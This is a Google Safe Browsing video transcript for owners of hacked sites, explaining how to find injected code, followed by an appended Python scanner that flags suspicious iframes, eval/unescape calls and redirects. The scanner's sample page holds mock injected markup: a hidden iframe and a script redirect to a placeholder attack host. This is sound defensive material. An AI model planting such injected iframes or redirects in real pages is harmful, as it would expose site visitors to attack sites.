Help for hacked sites: Code injection

[MUSIC PLAYING]

Hi. I’m Lucas Ballard. I’m a software engineer at Google, and I work on Google Safe Browsing. I’d like to provide more information for site owners who are notified that their site was infected with malware, specifically with the type code injection.

If your site is infected with malware, you can see sample infected URLs and the type of the infection when you verify ownership of your site in Google Webmaster Tools. Google Webmaster Tools can be found at google.com/webmasters.

With regard to the malware type code injection, this means that pages on your site were modified to include malicious code. If you’ve verified ownership of your site in Webmaster Tools, go to the Malware section and take note of the sample URLs associated with code injection.

Next, try to confirm the code injection by viewing the source code for these sample URLs. You can use wget or curl. Just remember, your site will need to be back online first. Once you have an idea of the hacker’s injected code through wget or curl, you can further investigate by logging into the file system. View all files used to generate the sample URLs.

Some examples of malicious code injections include an iFrame to an attack site, JavaScript or another scripting language that calls and runs scripts from an attack site, scripting that redirects the browser to an attack site, and malicious code that’s obfuscated to avoid detection.

To assess the damage caused by malware injections, investigate all possible harmful code present on the site. It may be helpful to search for words like “iFrame” to find iFrame code. Malicious iFrames are fairly common. Other helpful keywords are “script” with complicated constructs like eval and unescape.

When you’re ready to clean up your site, which is a future step in our Hacked Site recovery process, you can either replace infected files with the last good backup, or you can remove the code injection from each page in all related scripting functions or files. Remember that deleting the malicious code doesn’t correct the underlying vulnerability that allowed the hacker to compromise your site in the first place.

To more thoroughly investigate the hacker’s damage on your entire site, check out file system damage assessment. Thanks for watching.

[MUSIC PLAYING]
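
The keyword search described in the transcript, as an added example that is not part of the video or any Google tool: it scans page source (fetched with wget or curl, or read from the file system) for iframes and scripts loaded from other hosts, eval/unescape calls, script redirects and long encoded strings. The patterns, the `own_hosts` parameter and the sample page are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# Triage patterns for the injection types listed in the video. The regexes
# are assumptions made for this example, not Safe Browsing's detection logic.
SRC_TAG = re.compile(r"<(iframe|script)\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
KEYWORDS = [
    ("eval/unescape", re.compile(r"\b(?:eval|unescape)\s*\(", re.I)),
    ("redirect", re.compile(r"\blocation(?:\.href)?\s*=[^=]|\blocation\.replace\s*\(", re.I)),
    ("encoded-blob", re.compile(r"(?:%[0-9a-f]{2}|\\x[0-9a-f]{2}){16,}", re.I)),
]

def _host(src):
    """Host part of a src URL; None for relative URLs."""
    try:
        return urlparse(src).hostname
    except ValueError:  # malformed URL, e.g. a broken IPv6 literal
        return "<malformed>"

def scan_source(text, own_hosts=frozenset()):
    """Return (line_number, label) pairs, in line order, worth a manual look."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for tag, src in SRC_TAG.findall(line):
            host = _host(src)
            # Relative URLs and the site's own hosts are expected; flag the rest.
            if host and host not in own_hosts:
                findings.append((lineno, f"external-{tag.lower()}"))
        for label, pattern in KEYWORDS:
            if pattern.search(line):
                findings.append((lineno, label))
    return findings

# Constructed sample page; hosts and paths are placeholders.
SAMPLE = '''<html><body>
<script src="/js/site.js"></script>
<iframe src="http://attack.example/in.php" width="1" height="1"></iframe>
<script>eval(unescape("%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%78%27%29"));</script>
<script>window.location = "http://attack.example/landing";</script>
<iframe src="https://www.mysite.example/widget"></iframe>
</body></html>'''

if __name__ == "__main__":
    for lineno, label in scan_source(SAMPLE, {"www.mysite.example"}):
        print(f"line {lineno}: {label}")
```

Hits are leads for manual review rather than verdicts: legitimate libraries also use eval and redirects, and obfuscated injections can avoid these keywords entirely.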
